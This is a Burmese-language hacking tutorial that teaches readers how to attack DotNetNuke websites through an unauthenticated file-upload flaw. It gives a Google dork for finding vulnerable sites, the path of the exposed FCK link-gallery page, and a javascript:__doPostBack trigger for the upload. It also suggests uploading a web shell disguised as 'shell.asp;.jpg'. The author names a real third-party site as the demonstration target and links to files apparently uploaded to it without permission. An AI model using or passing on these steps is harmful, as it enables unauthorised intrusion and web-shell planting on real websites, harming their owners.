DNN Website - File Uploading [Exploit]

DNN ( Dot Net Nuke )
 အဲ..သူ ့ကိုဟက္ရတာကေတာ့ လြယ္ပါတယ္။ ဘယ္သူမဆုိလုပ္ႏုိင္ပါလိမ့္မယ္။ လုိအပ္တာက vul ျဖစ္ေနတဲ့ sites list ေတြပါ။ ဒါဆုိ ကြ်န္ေတာ္တုိ ့ ဒီေအာက္မွာ ေပးထားတဲ့ Dorks နဲ ့ google မွာထည့္ပီးရွာပါမယ္…

inurl:/tabid/36/language/en-US/Default.aspx

Google မွာရုိက္ထည့္လုိက္ရင္ sites list ေတြႀကလာပါလိမ့္မယ္။ ဒါဆုိ vul ျဖစ္ေနတဲ့ sites ေတြကိုရပီဆုိရင္ ..
ကြ်န္ေတာ္တုိ ့ သူ ့ကိုစျပီး Hack ဖုိ ့ ေအာက္က code ႏွစ္ေႀကာင္းလုိ ပါတယ္… 
1. Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

2. javascript:__doPostBack('ctlURL$cmdUpload','')



ဒါဆုိရင္ .. စလုိ ့ရပါျပီ.. အသံုးျပ ုရမယ့္ browser ကေတာ့ Google Chrome ပါ။ Mozilla Firefox နဲ ့ကြ်န္ေတာ္စမ္းသေလာက္ေတာ့ အသံုးျပ ုလုိ ့မရပါဖူး။ ကဲ..ကြ်န္ေတာ္ရွာထားတဲ့ ဆုိဒ္နဲ ့စမ္းျပပါမယ္ ဒီဆုိဒ္ေလးပါ. http://www.clubdelbenessere.com/Home...S/Default.aspx သူ ့ကုိ Google Chrome မွာဖြင့္လုိက္ပါ ေအာက္ကပံုေလးပါ…

အေပၚမွာေပးထားတဲ့ နံပါတ္ 1 ကုဒ္ေလးကို site url ေနာက္မွာ အစားထုိးေပးရပါမယ္ .. ဒီလုိေလးပါ
http://www.clubdelbenessere.com/Prov...nkgallery.aspx ျပီးရင္ Enter ေခါက္လုိက္တာနဲ ့ ဒီေအာက္က ပံုလုိမ်ဴးိေပၚလာပါလိမ့္မယ္….


တစ္ခ်ဴိ ့ဆုိဒ္ေတြက်ေတာ့ အေပၚက ပံုမ်ဴိးမေပၚပဲ ေအာက္ကပံုလုိမ်ဴိးေပၚလာရင္ေတာ့ 
ဟီး.. ေနာက္တစ္ဆုိဒ္ေျပာင္းျပီး လုပ္လုိက္ပါ…. ဒီပံုေလးပါဘဲ ...



ျပီးရင္.. 
Link Type : File (A File On Your Site) ေျပာင္းေပးပါ..
File Location : Root ထားေပးပါ…
File Name : m.txt , shell.asp;.jpg ,etc…… ကို ကိုယ္တင္ခ်င္တဲ့ ဖုိင္အမ်ဴိးအစားကုိ ေရြးေပးရမွာပါ.. ကြ်န္ေတာ္ကေတာ့ txt ဖုိင္ တင္မွာမုိ ့လုိ ့ m.txt ဖုိင္ကုိ ေရြးထားတာပါ။ ေနာက္ျပီး အေပၚက url bar တန္းေလးမွာ ကြ်န္ေတာ္ အေပၚမွာေပးထားတဲ့ နံပါတ္ ၂ ကုဒ္ေလးကုိ ထည့္ေပးလုိက္ပါ..ေအာက္ကပံုပါ..


ျပီးရင္ Enter ေခါက္လုိက္တာနဲ ့ ေအာက္ကပံုလုိမ်ဴိး ဖုိင္ Upload ခြင့္ရပါပီ.. ကြ်န္ေတာ္ကေတာ့ mhu.txt ဖုိင္ေလးကို upload လုပ္မွာပါ။ ဒီေအာက္ကပံုေလးပါ…


ဒါဆုိ ကြ်န္ေတာ္တုိ ့Upload Selected File ဆုိတာေလးကုိ ႏွိပ္ေပးလုိက္ရင္ ဒီလုိေလးေပၚလာပါလိမ့္မယ္…


mhu.txt ဖုိင္ကုိ upload လုပ္ျပီးသြားပါပီ။အဲဒါဆုိ ကြ်န္ေတာ္တုိ ့တင္လုိက္တဲ့ mhu.txt ဖုိင္ရဲ့ သူ ့ရဲ့ဖုိင္ လမ္းေႀကာင္းက ဒီလုိေလးပါ..
http://www.clubdelbenessere.com/portals/0/mhu.txt ဒီေအာက္ကပံုေလးပါ…



Demo link : http://www.clubdelbenessere.com/portals/0/mhu.txt
Demo link : http://www.clubdelbenessere.com/portals/0/1o1.txt
Shell တင္လုိ ့ရမရေတာ့ ကြ်န္ေတာ္လည္း မစမ္းရေသးပါဖူး… ဘာျဖစ္လုိ ့လဲဆုိေတာ့ လမ္းႀကံ ုရင္းနဲ ့ေတြ ့မိလုိက္လုိ ့တင္လုိက္တာပါ.. ရွာေနတာက တစ္ခု ဟီး… 
ကဲ.. The End .. .. ..

Credit : Unknow 
Copy =>   1o1or1not1 (MHU- Hacker)

P.S > က်ြန္ေတာ္ Demo ေတြကေတာ့ => http://www.clubdelbenessere.com/portals/0/liT2le.txt